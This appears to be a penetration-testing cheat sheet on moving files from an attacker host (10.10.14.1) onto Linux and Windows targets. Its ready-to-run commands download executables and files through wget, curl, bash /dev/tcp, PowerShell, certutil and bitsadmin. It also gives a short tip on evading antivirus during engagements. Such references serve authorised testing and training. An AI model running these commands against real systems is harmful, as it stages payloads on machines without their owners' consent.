File Transfer

Sections File Transfer

Move files between attacker and target. Pick the method that survives the network you are in.

LHOST=10.10.14.1

i. Serve from attacker

Python HTTP, no uploads:

python3 -m http.server 80

Python HTTP with upload support, accepts POST to /upload:

pip install uploadserver
python3 -m uploadserver 80

SMB share, useful for Windows targets that block HTTP egress:

impacket-smbserver share . -smb2support                                ## guest access
impacket-smbserver share . -smb2support -user u -password p            ## auth required

PHP HTTP, when python is missing:

php -S 0.0.0.0:80

WebDAV, drag-and-drop friendly from Windows Explorer:

wsgidav --port=8080 --root=. --auth=anonymous

ii. Pull on Linux target 

wget http://$LHOST/file -O /tmp/file
curl http://$LHOST/file -o /tmp/file

No wget or curl, pure bash:

exec 3<>/dev/tcp/10.10.14.1/80
echo -e "GET /file HTTP/1.0\r\nHost: $LHOST\r\n\r\n" >&3
cat <&3 > /tmp/file
exec 3>&-

Over openssl when only HTTPS works:

echo -e "GET /file HTTP/1.0\r\nHost: $LHOST\r\n\r\n" | openssl s_client -quiet -connect $LHOST:443 2>/dev/null | sed '1,/^\r\{0,1\}$/d' > /tmp/file

Via Python when only python is on the box:

python3 -c "import urllib.request; urllib.request.urlretrieve('http://10.10.14.1/file','/tmp/file')"

iii. Pull on Windows target

PowerShell, the default:

(New-Object Net.WebClient).DownloadFile('http://10.10.14.1/f.exe','C:\Windows\Temp\f.exe')
iwr -uri http://10.10.14.1/f.exe -outfile C:\Windows\Temp\f.exe
Invoke-WebRequest http://10.10.14.1/f.exe -OutFile C:\Windows\Temp\f.exe

When PowerShell is blocked, certutil from cmd:

certutil -urlcache -split -f http://10.10.14.1/f.exe C:\Windows\Temp\f.exe

Via SMB, no HTTP needed:

copy \\10.10.14.1\share\f.exe C:\Windows\Temp\

bitsadmin, legacy but works:

bitsadmin /transfer job /download /priority high http://10.10.14.1/f.exe C:\Windows\Temp\f.exe
AV / Defender

certutil and bitsadmin are flagged by every modern AV. For real engagements use signed binaries and HTTPS, or pull through a tunnel from Pivoting .

iv. Cut and paste, no network at all

Small files survive any transport this way. Encode on attacker:

base64 -w0 < file

Paste into target shell:

echo BASE64HERE | base64 -d > /tmp/file

Heredoc for text files, no escaping nightmares:

cat > /tmp/file <<'EOF'
... paste content here ...